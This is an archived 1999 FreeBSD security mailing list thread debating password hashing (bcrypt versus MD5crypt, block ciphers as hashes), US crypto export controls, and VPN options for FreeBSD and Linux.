X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail)
To: Peter Jeremy , nick@shibumi.feralmonkey.org
Subject: Re: Blowfish/Twofish
Cc: freebsd-security@FreeBSD.ORG
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii

On May 3, 2:09am, Peter Jeremy (possibly) wrote:
> 0x1c wrote:
> >On a similar note, is there any restriction on one-way hashing algorithms?
> >I forget.
> AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to all be freely
> exportable. The export restrictions appear to be on crypto for
> `secrecy', whilst crypto for `authentication' is unrestricted.
> (This does suggest that some lessons in basic cryptography are
> needed around the US State Department).

Actually, no... as long as you assume their basic motivation is to
limit _convenient_ cryptography. Remember the "cryptographic hooks"
nonsense? They're pretty obviously trying to make it as hard as
possible/practical for private citizens to use cryptography that the US
government can't break.
	-Allen

--
Allen Smith			easmith@beatrice.rutgers.edu

From owner-freebsd-security Sun May 2 23:59:47 1999
Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id F304114DA5 for ; Sun, 2 May 1999 23:59:40 -0700 (PDT) (envelope-from nick@shibumi.feralmonkey.org)
Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id RAA03995; Mon, 3 May 1999 17:53:30 GMT (envelope-from nick@shibumi.feralmonkey.org)
Date: Mon, 3 May 1999 17:53:29 +0000 (GMT)
From: 0x1c
To: Robert Watson
Cc: freebsd-security@freebsd.org
Subject: Re: Blowfish/Twofish
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 3 May 1999, Robert Watson wrote:

> I don't believe so, as long as they are not just crypto algorithms. I.e.,
> I believe our DES hashing is not exportable, whereas our MD5 hashing is.
> In a sense, it's all a matter of perspective on how you use an algorithm.
> It's all just mathematics, right? Sort of like you can't patent
> mathematical formulas, but you can patent algorithms. :) So SHA-1 support
> for FreeBSD would be quite exportable, I'd imagine, and would probably
> make a worthwhile addition. I don't see Blowfish as a great addition
> other than the interoperability concerns expressed previously.
>
> Far more important, in my mind, is making the IPsec/IPv6 code part of the
> base distribution. If I really want your password, I'll sniff it or
> trojan a binary once I have root, something that I already have to have to
> get your password file in almost all cases.

This has opened up a can of worms the last few times it was raised.
Even if IPSec reached a baseline standard, instead of an evolving one,
you'd need to choose which camp to integrate from (KAME or erm, NRL?),
and ensure that it was available outside the US in a package format or
similar.

Nick

> On Mon, 3 May 1999, 0x1c wrote:
>
> > On a similar note, is there any restriction on one-way hashing algorithms?
> > I forget.
> >
> > Nick
[...]

--
Therefore those skilled at the unorthodox are as infinite as heaven and
earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War

From owner-freebsd-security Mon May 3 0: 8:36 1999
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 3D8A614F41 for ; Mon, 3 May 1999 00:08:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id JAA27207; Mon, 3 May 1999 09:08:31 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id JAA37791; Mon, 3 May 1999 09:08:29 +0200 (MET DST)
Date: Mon, 3 May 1999 09:08:29 +0200
From: Eivind Eklund
To: Dug Song
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990503090829.N32819@bitbox.follo.net>
References: <19990502122142.A289@samurai.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.1i
In-Reply-To: ; from Dug Song on Sun, May 02, 1999 at 03:48:52PM -0400

On Sun, May 02, 1999 at 03:48:52PM -0400, Dug Song wrote:
> On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote:
> >
> > The point of this exercise would (IMO, at least) only be OpenBSD
> > compatibility, where OpenBSD for marketeering reasons has decided to
> > use Blowfish as part of their hash algorithm.
>
> marketeering? read the paper being presented by Niels Provos and David
> Mazieres at next month's USENIX (FREENIX track), and decide for yourself -
> "A Future-Adaptable Password Scheme":

Let me try to write the same as above in a slightly different way: I
don't believe the use of Blowfish as a part of the hash algorithm is
necessary to achieve the design goals, and I believe it was done in
order to show off OpenBSD's ability to include crypto in the core
distribution. I may be wrong; it is credible to have done so for
convenience reasons, too, if the authors had already developed an
extensible cipher based on Blowfish, and did not want to repeat their
work or force cryptanalysis of two systems instead of one.

If FreeBSD should switch default password storage hash, my vote would
be for something that allowed secure challenges against it - e.g. SRP
(which is much more elegant than my own proposal to achieve the same
goal, which was based on searching for RSA keys).

Eivind.

From owner-freebsd-security Mon May 3 0:47:39 1999
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 4EF9814E16 for ; Mon, 3 May 1999 00:47:35 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id JAA27780; Mon, 3 May 1999 09:45:21 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id JAA06767; Mon, 3 May 1999 09:45:11 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Peter Jeremy
Cc: adam@homeport.org, freebsd-security@FreeBSD.ORG
Cc: provos@openbsd.org, dm@openbsd.org
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Mon, 03 May 1999 12:02:44 +1000." <99May3.114810est.40331@border.alcanet.com.au>
Date: Mon, 03 May 1999 09:45:10 +0200
Message-ID: <6765.925717510@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <99May3.114810est.40331@border.alcanet.com.au>, Peter Jeremy writes:
>Adam Shostack wrote:
>>The reason to not use it for passwords is that the function you want
>>(if you're going to not change the model), is a hash function, not a
>>block cipher.
>
>You'd better let Bob Morris know this :-).
>
>Why can't a block cipher (like, say DES) be used for a password
>hashing function? (It can, but we can't export it from the US.)

My final comments on this thread will be this:

I think you are all overlooking the important bit of the password
field as stored in /etc/master.passwd: the "$1$" which starts the
field. This is the part that allows us to change the algorithm at
any time where we feel the need.

I just scanned the http://www.citi.umich.edu/u/provos/papers/bcrypt.ps.gz
paper, and they too seem to overlook that the important thing is not
to be able to design an algorithm which will last for a thousand years,
but the ability to use a new one when we need to.

That is not to say that the stuff they've come up with isn't better
than what we have, it certainly looks a lot more robust. It lacks
the stamp of approval for export from the US which MD5 has, but
that could probably be arranged too.

In difference from virtually all other cryptographic uses, we don't
care much about our data (plaintext passwords), we can replace them
cheaply and easily, we just don't want anybody (ourselves included)
to be able to read them.

This is what gives rise to what I call the "Kleenex-method": if our
algorithm gets compromised, or even just a credible threat of a
weakness, we'll just replace our algorithm *AND OUR DATA* with
whatever we feel the best candidate at the time.
The worried looks which the paper gives the MD5 acrobatics I wrote are
probably fair and just. It has to be remembered that I was not trying
to beat the DES based code, but rather the lousy XOR based hash we
used for export at the time. I think that I succeeded in beating the
DES based code by a huge margin also, and I think that has protected
a lot of FreeBSD based systems in the last 5 years from brute-force or
dictionary attacks, and I would personally think that the MD5 code can
safely last another 3 years.

We have the mechanisms in place for running multiple algorithms
already, so I don't see any particular reason to have wild arguments
about which one we should use: take your own pick. In the FreeBSD
project we have some concerns to address about exportability, but
otherwise there are no restrictions.

I don't know if we should set up a "registry" for the identifying
magic strings ($1$, $2$, $2a$ and so on) to avoid clashes, maybe we
could get the IANA to do it for us if we managed to squeeze a RFC
through the editors.

[provos, dm: should we attempt this ?]

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon May 3 1:54:35 1999
Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 7431B15614 for ; Mon, 3 May 1999 01:54:23 -0700 (PDT) (envelope-from jeroen@vangelderen.org)
Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:28420 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8033-20164>; Mon, 3 May 1999 10:54:05 +0200
Message-ID: <372D6435.8EF1437A@vangelderen.org>
Date: Mon, 03 May 1999 10:54:13 +0200
From: "Jeroen C. van Gelderen"
X-Mailer: Mozilla 4.51 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Adam Shostack
Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
References: <372C19F5.625BB2B@vangelderen.org> <19990502215431.A22973@weathership.homeport.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Adam Shostack wrote:
[...]
> | In any case, if you recommend against using Blowfish, what's the
> | reason?
>
> The reason not to use Blowfish is (imho) the Pi key scheduling. Key
> schedules need to be designed, not taken at random from nature.

Uhm, AFAIK the Blowfish key schedule was designed, it just happens to
use digits of Pi as magic numbers. The designers just wanted to err on
the safe side and they effectively created a very inefficient one-way
'hash' for the key schedule. They did this because a lot of key
schedules were attacked and broken.

> The reason to not use it for passwords is that the function you want
> (if you're going to not change the model), is a hash function, not a
> block cipher.

The original recommendation was Twofish over Blowfish. My point was
that Twofish is too new to recommend. In any case, you can turn block
ciphers into hashes if they can withstand certain kinds of attacks.

Cheers,
Jeroen
--
Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE

From owner-freebsd-security Mon May 3 2:22:13 1999
Received: from enst.enst.fr (enst.enst.fr [137.194.2.16]) by hub.freebsd.org (Postfix) with ESMTP id C37E31564C for ; Mon, 3 May 1999 02:22:10 -0700 (PDT) (envelope-from beyssac@enst.fr)
Received: from bofh.enst.fr (bofh.enst.fr [137.194.32.191]) by enst.enst.fr (8.9.1a/8.9.1) with ESMTP id LAA19857; Mon, 3 May 1999 11:21:54 +0200 (MET DST)
Received: by bofh.enst.fr (Postfix, from userid 12426) id 734EBD223; Mon, 3 May 1999 11:21:54 +0200 (CEST)
Message-ID: <19990503112154.A20922@enst.fr>
Date: Mon, 3 May 1999 11:21:54 +0200
From: Pierre Beyssac
To: Allen Smith , Robert Watson , 0x1c
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
References: <9905030205.ZM6442@beatrice.rutgers.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <9905030205.ZM6442@beatrice.rutgers.edu>; from Allen Smith on Mon, May 03, 1999 at 02:05:30AM -0400

On Mon, May 03, 1999 at 02:05:30AM -0400, Allen Smith wrote:
> One can use any cryptographically secure one-way hash function as a
> (secret key) encryption method. The procedure is as follows:
>
> Sender and recipient have shared secret key K. They want to transmit
> information I. Sender takes three-bit chunks (the most efficient size)
> of information I, finds a random salt S of sufficient size for each

There's a simpler way that doesn't require you to compute several
hashes for the same data: simply use your hash function as a
pseudo-random generator using the key as a seed, then XOR the
resulting stream with your data.
However, it seems using this scheme is not recommended by experts
in the field, on the assumption that hash functions are not designed
to withstand the same kind of attacks as cipher functions.
--
Pierre Beyssac		pb@enst.fr

From owner-freebsd-security Mon May 3 3:35:23 1999
Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 6533B15435 for ; Mon, 3 May 1999 03:35:20 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu)
Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id GAA01126; Mon, 3 May 1999 06:18:11 -0400 (EDT)
From: "Allen Smith"
Message-Id: <9905030618.ZM1124@beatrice.rutgers.edu>
Date: Mon, 3 May 1999 06:18:11 -0400
In-Reply-To: Pierre Beyssac "Re: Blowfish/Twofish" (May 3, 5:05am)
References: <9905030205.ZM6442@beatrice.rutgers.edu> <19990503112154.A20922@enst.fr>
X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail)
To: Pierre Beyssac , Robert Watson , 0x1c
Subject: Re: Blowfish/Twofish
Cc: freebsd-security@FreeBSD.ORG
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii

On May 3, 5:05am, Pierre Beyssac (possibly) wrote:
> On Mon, May 03, 1999 at 02:05:30AM -0400, Allen Smith wrote:
> > One can use any cryptographically secure one-way hash function as a
> > (secret key) encryption method. The procedure is as follows:
> >
> > Sender and recipient have shared secret key K. They want to transmit
> > information I. Sender takes three-bit chunks (the most efficient size)
> > of information I, finds a random salt S of sufficient size for each
>
> There's a simpler way that doesn't require you to compute several
> hashes for the same data: simply use your hash function as a
> pseudo-random generator using the key as a seed, then XOR the
> resulting stream with your data.
>
> However, it seems using this scheme is not recommended by experts
> in the field, on the assumption that hash functions are not designed
> to withstand the same kind of attacks as cipher functions.

True... because what makes a cryptographically secure hash is:

A. you can't figure out the input from the output; and
B. the output is evenly distributed over the input space (it isn't all
   clumped up).

Neither of these mean that you can't figure out the output if you know
the input, or some portion of it (i.e., the previous output of the hash
function).

	-Allen

--
Allen Smith			easmith@beatrice.rutgers.edu

From owner-freebsd-security Mon May 3 7: 6:38 1999
Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id 8DB2B15136 for ; Mon, 3 May 1999 07:06:02 -0700 (PDT) (envelope-from adam@weathership.homeport.org)
Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA25736; Mon, 3 May 1999 10:22:20 -0400 (EDT)
Date: Mon, 3 May 1999 10:22:20 -0400
From: Adam Shostack
To: Peter Jeremy
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990503102220.A25694@weathership.homeport.org>
References: <99May3.114810est.40331@border.alcanet.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <99May3.114810est.40331@border.alcanet.com.au>; from Peter Jeremy on Mon, May 03, 1999 at 12:02:44PM +1000

On Mon, May 03, 1999 at 12:02:44PM +1000, Peter Jeremy wrote:
| Adam Shostack wrote:
| >The reason to not use it for passwords is that the function you want
| >(if you're going to not change the model), is a hash function, not a
| >block cipher.
|
| You'd better let Bob Morris know this :-).
|
| Why can't a block cipher (like, say DES) be used for a password
| hashing function? (I realise that the DES used for Unix password
| hashing is `tweaked', but that was done solely to prevent people using
| off-the-shelf DES hardware to crack passwords - the salt can be
| injected in several other ways).

It can, but when you want irreversibility, it's useful to use a
function designed with that in mind. The fact that you can use block
ciphers as hashes, and hashes as block ciphers, does not mean that it's
a good idea to go around doing so. It means that the theoreticians in
the field are working out how they interact.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

From owner-freebsd-security Mon May 3 8: 4: 3 1999
Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 04BF914E0F for ; Mon, 3 May 1999 08:04:00 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com)
Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA21305; Mon, 3 May 1999 11:03:55 -0400 (EDT) (envelope-from cjc)
From: "Crist J. Clark"
Message-Id: <199905031503.LAA21305@cc942873-a.ewndsr1.nj.home.com>
Subject: Re: Blowfish/Twofish
In-Reply-To: <9905030214.ZM6494@beatrice.rutgers.edu> from Allen Smith at "May 3, 99 02:14:40 am"
To: easmith@beatrice.rutgers.edu (Allen Smith)
Date: Mon, 3 May 1999 11:03:55 -0400 (EDT)
Cc: peter.jeremy@auss2.alcatel.com.au, nick@shibumi.feralmonkey.org, freebsd-security@FreeBSD.ORG
Reply-To: cjclark@home.com
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Allen Smith wrote,
> On May 3, 2:09am, Peter Jeremy (possibly) wrote:
> > 0x1c wrote:
> > >On a similar note, is there any restriction on one-way hashing algorithms?
> > >I forget.
> > AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to all be freely
> > exportable. The export restrictions appear to be on crypto for
> > `secrecy', whilst crypto for `authentication' is unrestricted.
> > (This does suggest that some lessons in basic cryptography are
> > needed around the US State Department).
>
> Actually, no... as long as you assume their basic motivation is to
> limit _convenient_ cryptography. Remember the "cryptographic hooks"
> nonsense? They're pretty obviously trying to make it as hard as
> possible/practical for private citizens to use cryptography that the US
> government can't break.

I've always accepted the point of view from Press, Flannery, Teukolsky,
and Vetterling from _Numerical Recipes in C_ when they talk about DES,

"A key controversial question is whether the NSA purposefully weakened
the algorithm [DES], so that it had vulnerabilities significant enough
to be exploited by NSA's own multi-billion dollar resources, but not so
significant as to be exploitable by someone else. For our purposes we
hardly need to know the answer to this: A random number generator whose
deviations from randomness can be discerned only by concerted attack
with resources comparable to NSA -- that random number generator should
surely be contender for "World's Best" title."

The moral of the story being, if the US government wants your data bad
enough... they _are_ going to get it. Just as the government can only
make it inconvenient for private citizens (in the US or foreign, the
ones NSA is interested in) to use encryption; the private citizens (or
again, NSA is most concerned with foreign governments) can really only
make it inconvenient for the US government to decrypt it.
--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Mon May 3 9: 0:16 1999
Received: from reeducation-labor.lcs.mit.edu (reeducation-labor.lcs.mit.edu [18.26.4.10]) by hub.freebsd.org (Postfix) with ESMTP id 8460815235 for ; Mon, 3 May 1999 09:00:11 -0700 (PDT) (envelope-from dm@reeducation-labor.lcs.mit.edu)
Received: (from dm@localhost) by reeducation-labor.lcs.mit.edu (8.9.3/8.8.7) id LAA09846; Mon, 3 May 1999 11:54:48 -0400 (EDT)
Date: Mon, 3 May 1999 11:54:48 -0400 (EDT)
Message-Id: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>
From: David Mazieres
To: phk@critter.freebsd.dk
Cc: peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org
In-reply-to: <6765.925717510@critter.freebsd.dk> (message from Poul-Henning Kamp on Mon, 03 May 1999 09:45:10 +0200)
Subject: Re: Blowfish/Twofish
References: <6765.925717510@critter.freebsd.dk>

> cc: adam@homeport.org, freebsd-security@FreeBSD.ORG
> cc: provos@openbsd.org, dm@openbsd.org
> Date: Mon, 03 May 1999 09:45:10 +0200
> From: Poul-Henning Kamp
>
> My final comments on this thread will be this:
>
> I think you are all overlooking the important bit of the password
> field as stored in /etc/master.passwd: the "$1$" which starts the
> field. This is the part that allows us to change the algorithm at
> any time where we feel the need.

Well, I missed the beginning of the thread, but just got CCed on this,
so I will respond.

First of all, the "$1$" clearly is important, because even
variable-cost hashes could potentially fail. We mention this briefly
in our implementation section. I now regret that we did not credit
FreeBSD for this more explicitly. We weren't really trying to claim
this as a contribution; we just wanted to make the point that it's
easy to have multiple hash functions in one password file.

> That is not to say that the stuff they've come up with isn't better
> than what we have, it certainly looks a lot more robust. It lacks
> the stamp of approval for export from the US which MD5 has, but
> that could probably be arranged too.

You could easily create an implementation of bcrypt that could not be
used as a block cipher. What exactly is magically blessed about MD5?
MD5's compression function (or MD5 itself) functions perfectly well as
a block cipher in OFB or CFB modes. Is there some directive from the
US government allowing the export of MD5 in source form? Bcrypt could
easily be manipulated to achieve the same status as, say,
arc4random--based on ARC4, but the implementation is hard to use for
encryption.

> In difference from virtually all other cryptographic uses, we don't
> care much about our data (plaintext passwords), we can replace them
> cheaply and easily, we just don't want anybody (ourselves included)
> to be able to read them.

Of course you can do that. You are effectively using the shared
library version number on libc or libcrypt to determine the cost of
hashing passwords. It's a lot nicer to have the two decoupled.
If you are uncomfortable incorporating bcrypt for export-control reasons, I would still encourage you to allow variable cost in whatever you design next to replace MD5crypt (i.e. $3$). I think at this point people can probably tolerate an algorithm about 10 times slower than MD5crypt. It should probably require between 1/10th of a second and one second to check a password, depending on the speed of the hardware.

David

From owner-freebsd-security Mon May  3 09:09:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mordor.xti.org (mordor.xti.org [193.212.232.254]) by hub.freebsd.org (Postfix) with SMTP id 1E76C15242 for ; Mon, 3 May 1999 09:09:40 -0700 (PDT) (envelope-from delta@xti.org)
Received: (qmail 3781 invoked from network); 3 May 1999 11:44:01 -0000
Received: from mordor.xti.org (193.212.232.254) by login.xti.org with SMTP; 3 May 1999 11:44:01 -0000
Date: Mon, 3 May 1999 13:44:01 +0200 (CEST)
From: Terje Elde
To: freebsd-security@freebsd.org
Subject: VPN, what to use?
Message-ID:
KEY-ID: 0x5B439BB3
Stuff: Why are you reading all the headers?? Do you think I hide lots of stuff up here??
Question: Do you know where *your* towel is?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi all,

I've been (for a LONG time) looking for some kind of compatible VPN package. It seems that cipe is linux-only, skip is for freebsd, sun and windows, IPSec is for everything but you can't both use kame and track a -stable thread as kame is distributed as patches against -RELEASE.

What I really want is to have a small VPN, with only FreeBSD and linux boxes, but it seems you can't really do that.

Then I noticed the manual keying thing of KAME. It looks a lot like IPSec, so what I'm starting to wonder is, can I use KAME with manual keying against a linux box running IPSec?

Or am I totally lost now?

Friendly greetings,
Terje Elde

"One world, one web, one program" - Microsoft Promo ad.
"Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler

From owner-freebsd-security Mon May  3 09:20:04 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id E42CC15043 for ; Mon, 3 May 1999 09:20:00 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id SAA00180; Mon, 3 May 1999 18:18:05 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id SAA08576; Mon, 3 May 1999 18:18:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: David Mazieres
Cc: peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Mon, 03 May 1999 11:54:48 EDT." <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>
Date: Mon, 03 May 1999 18:18:01 +0200
Message-ID: <8574.925748281@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>, David Mazieres writes:
> Well, I missed the beginning of the thread, but just got CCed on this,
> so I will respond.
>
> First of all, the "$1$" clearly is important, because even
> variable-cost hashes could potentially fail. We mention this briefly
> in our implementation section. I now regret that we did not credit
> FreeBSD for this more explicitly. We weren't really trying to claim
> this as a contribution; we just wanted to make the point that it's
> easy to have multiple hash functions in one password file.

Ahh, don't worry about that, we have the stuff in the CVS trees if we ever get to disagree about where it came from :-)

>> That is not to say that the stuff they've come up with isn't better
>> than what we have, it certainly look a lot more robust. It lacks
>> the stamp of approval for export from the US which MD5 has, but
>> that could probably be arranged too.
>
> You could easily create an implementation of bcrypt that could not be
> used as a block cipher. What exactly is magically blessed about MD5?

It's been blessed for export by the US gov in any form.

>> In difference from virtually all other cryptographic uses, we don't
>> care much about our data (plaintext passwords), we can replace them
>> cheaply and easily, we just don't want anybody (ourselves included)
>> to be able to read them.
>
> Of course you can do that. You are effectively using the shared
> library version number on libc or libcrypt to determine the cost of
> hashing passwords. It's a lot nicer to have the two decoupled.

You lost me there... All I meant was that passwords should be changed every so often anyway, so changing algorithm doesn't have the tremendous scope it would have if you had a 5 year archive of correspondence encrypted (retrieve, decrypt, encrypt, store, delete+wipe old versions from media/destroy old media).

> If you are uncomfortable incorporating bcrypt for export-control
> reasons, I would still encourage you to allow variable cost in
> whatever you design next to replace MD5crypt (i.e. $3$). I think at
> this point people can probably tolerate an algorithm about 10 times
> slower than MD5crypt. It should probably require between 1/10th of a
> second and one second to check a password, depending on the speed of
> the hardware.
I have no plans on creating a $3$ in the foreseeable future, if at all: We'll probably just adopt something from OpenBSD :-)

Until we have some kind of assurance that $2a$ can be exported we will have to go through all the mess with the .za repository and all that to use it.

Poul-Henning

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon May  3 11:38:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id 6E29E14D71 for ; Mon, 3 May 1999 11:38:54 -0700 (PDT) (envelope-from mwlucas@easeway.com)
Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id OAA13711; Mon, 3 May 1999 14:28:03 -0400 (EDT)
Message-Id: <199905031828.OAA13711@easeway.com>
Subject: Re: VPN, what to use?
In-Reply-To: from Terje Elde at "May 3, 99 01:44:01 pm"
To: delta@xti.org (Terje Elde)
Date: Mon, 3 May 1999 14:28:03 -0400 (EDT)
Cc: freebsd-security@FreeBSD.ORG
From: mwlucas@exceptionet.com
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

Many people have addressed this problem by tunneling PPP over SSH. If you do a couple web searches on this, I'm sure you'll find some good pointers.

As far as your particular solution: sorry, can't help you. :/

==ml

> Hi all,
>
> I've been (for a LONG time) looking for some kind of compatible VPN
> package. It seems that cipe is linux-only, skip is for freebsd, sun and
> windows, IPSec is for everything but you can't both use kame and track a
> -stable thread as kame is distributed as patches against -RELEASE.
>
> What I really want is to have a small VPN, with only FreeBSD and linux
> boxes, but it seems you can't really do that.
>
> Then I noticed the manual keying thing of KAME. It looks a lot like IPSec,
> so what I'm starting to wonder is, can I use KAME with manual keying
> against a linux box running IPSec?
>
> Or am I totally lost now?
>
> Friendly greetings,
> Terje Elde
>
> "One world, one web, one program" - Microsoft Promo ad.
> "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler

--
Michael Lucas | Exceptionet, Inc. | www.exceptionet.com
"Exceptional Networking" |

From owner-freebsd-security Mon May  3 12:22:39 1999
Delivered-To: freebsd-security@freebsd.org
Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id 02BD7153CB for ; Mon, 3 May 1999 12:22:33 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net)
Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id PAA13122; Mon, 3 May 1999 15:25:00 -0400 (EDT)
Date: Mon, 3 May 1999 15:25:00 -0400 (EDT)
From: andrewr
To: David Mazieres
Cc: phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> You could easily create an implementation of bcrypt that could not be
> used as a block cipher. What exactly is magically blessed about MD5?
> MD5's compression function (or MD5 itself) functions perfectly well as
> a block cipher in OFB or CFB modes. Is there some directive from the
> US government allowing the export of MD5 in source form?

Are you suggesting the use of MD5? I'm assuming it would be bad to use MD5 because it is much quicker for one to possibly crack users' passwords..

-Andrew

From owner-freebsd-security Mon May  3 12:39:00 1999
Delivered-To: freebsd-security@freebsd.org
Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id A110615362 for ; Mon, 3 May 1999 12:38:56 -0700 (PDT) (envelope-from adam@weathership.homeport.org)
Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id PAA28496; Mon, 3 May 1999 15:52:05 -0400 (EDT)
Date: Mon, 3 May 1999 15:52:05 -0400
From: Adam Shostack
To: andrewr
Cc: David Mazieres, phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org
Subject: Re: Blowfish/Twofish
Message-ID: <19990503155204.A28374@weathership.homeport.org>
References: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: ; from andrewr on Mon, May 03, 1999 at 03:25:00PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 03, 1999 at 03:25:00PM -0400, andrewr wrote:
| > You could easily create an implementation of bcrypt that could not be
